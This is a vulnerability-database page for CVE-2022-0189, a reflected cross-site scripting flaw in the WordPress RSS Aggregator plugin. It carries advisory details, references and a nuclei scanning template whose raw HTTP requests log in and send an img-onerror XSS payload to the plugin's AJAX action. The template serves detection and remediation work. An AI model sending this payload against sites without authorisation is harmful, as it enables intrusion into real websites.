Lucene search
K

WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting. Vulnerability allows injection of malicious scripts, impacting session hijacking and data theft. Update to version 4.20 or later

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0189
28 Feb 202209:15
attackerkb
CNNVD
WordPress 跨站脚本漏洞
28 Feb 202200:00
cnnvd
CNVD
WordPress WP RSS Aggregator plugin cross-site scripting vulnerability
2 Mar 202200:00
cnvd
CVE
CVE-2022-0189
28 Feb 202209:06
cve
Cvelist
CVE-2022-0189 WP RSS Aggregator < 4.20 - Reflected Cross-Site Scripting (XSS)
28 Feb 202209:06
cvelist
EUVD
EUVD-2022-15393
3 Oct 202520:07
euvd
NVD
CVE-2022-0189
28 Feb 202209:15
nvd
OSV
CVE-2022-0189
28 Feb 202209:15
osv
Patchstack
WordPress WP RSS Aggregator plugin <= 4.19.3 - Reflected Cross-Site Scripting (XSS) vulnerability
26 Jan 202200:00
patchstack
Prion
Cross site scripting
28 Feb 202209:15
prion
Rows per page
id: CVE-2022-0189

info:
  name: WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.
  impact: |
    An attacker with authenticated access can inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update WordPress RSS Aggregator plugin to version 4.20 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/52a71bf1-b8bc-479e-b741-eb8fb9685014
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0189
    - https://plugins.trac.wordpress.org/changeset/2659298
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0189
    cwe-id: CWE-79
    epss-score: 0.02228
    epss-percentile: 0.80518
    cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wprssaggregator
    product: wp_rss_aggregator
    framework: wordpress
  tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,authenticated,wprssaggregator,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src onerror=alert(`document.domain`)>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022074ea40e5b9a2c36c6d091e31f18c2d82d0b0cc6e67194f276e1eaee9d2b1058c02206002b198e772c06dcf5eda0ba596b24dd640d9174eca73b7ba9c9bc0c1f824e1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 24.3
CVSS 3.16.1
EPSS0.02228
20